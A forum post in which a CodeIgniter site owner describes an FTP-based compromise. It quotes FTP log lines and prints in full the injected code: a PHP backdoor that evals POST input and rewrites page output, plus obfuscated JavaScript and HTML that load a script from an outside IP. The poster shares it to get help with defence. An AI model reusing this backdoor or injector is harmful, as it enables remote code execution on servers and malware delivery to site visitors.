Codeigniter Site Hacked

[eluser]Patient[/eluser]
Just had a codeigniter site hacked. It was accessed via ftp with a genuine ftp username. There are ~2700 ftp log entries within a 24 minute period. The ftp access went through the site directory retrieving pages and uploading many modified pages. The first few lines from the ftp log are (note xxxxxxxxxxxxxxxx = valid ftp user):

Code:

81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PASS (hidden)" 230 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PWD" 257 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "TYPE A" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,158,251" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "LIST /" 226 1432
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,222,47" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:27 -0500] "LIST /IE7" 226 1104
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "PORT 81,169,145,25,231,203" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "LIST /IE7/assets/director" 226 213
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "PORT 81,169,145,25,160,5" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "LIST /IE7/assets/img" 226 284
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,160,25" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "LIST /IE7/assets/js" 226 1091
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,237,105" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:34 -0500] "RETR /IE7/assets/js/effects.js" 226 38227
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:35 -0500] "PORT 81,169,145,25,240,127" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "STOR /IE7/assets/js/effects.js" 226 38453
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "PORT 81,169,145,25,243,1" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "RETR /IE7/assets/js/general.js" 226 870
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "PORT 81,169,145,25,244,181" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "STOR /IE7/assets/js/general.js" 226 1096
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:38 -0500] "PORT 81,169,145,25,246,133" 200 -

The modifications made to pages was:

PHP - added the following at the top of the page:

&lt;?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Nzb0ZjT2pjcjhuZ2lwZ0t0JTIwc29GcmNnSyUzRCUyRiUyRjk0bUxTJTJFMm9GNG9GN29GJTJFMiUyRTE5NSUyRmpxOG5ndWVPamNyeSUyRW1BamdLcyUzRSUzQ29GJTJGbUFzZ0tjbUxTcm1BaW9GcDhuZ3QlM0UnKS5yZXBsYWNlKC9tQXxnS3xtTFN8T2pjfDh4bXw4bmd8b0YvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#[removed]#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#[removed]&lt;!-- \ndocument\.write\(unescape\(.+?\n --&gt;[removed]#','',$s);if(stristr($s,'&lt;body'))$s=preg_replace('#(\s*&lt;body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'&lt;/body')||stristr($s,'&lt;/title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?&gt;

JS - added the following to the bottom of the pages:

&lt;!--
[removed](unescape('u8E<nUscAOCrDlsipt 29gsWvArc=29g//u8E94.Q9D247Dls.Q9D2WvA.AOC129g9Dls529g/nUjquWvAe29gr29gyAOC.jWvAs>PvM</scru8Ei29gpu8EtKF>').replace(/Q9D|KF|29g|nU|AOC|WvA|PvM|u8E|Dls/g,""));
--&gt;

HTML - added the following immediately before the &lt;body&gt; tag:

[removed]&lt;!--
[removed](unescape('<ZTsTmcbdariptta ZTsrc=ta/z0/M894.ta2bda4Qn47.2z0.195/ZTjquez0rTmy.jQn4sta></sM8cZTripM8t>').replace(/Tm|M8|si|ta|ZT|Qn4|z0|bda/g,""));
--&gt;[removed]

As far as I can see these are obfuscated commands to import a js file jquery.js from ip 94.247.2.195.

Anyone seen this?

Any way to protect the site?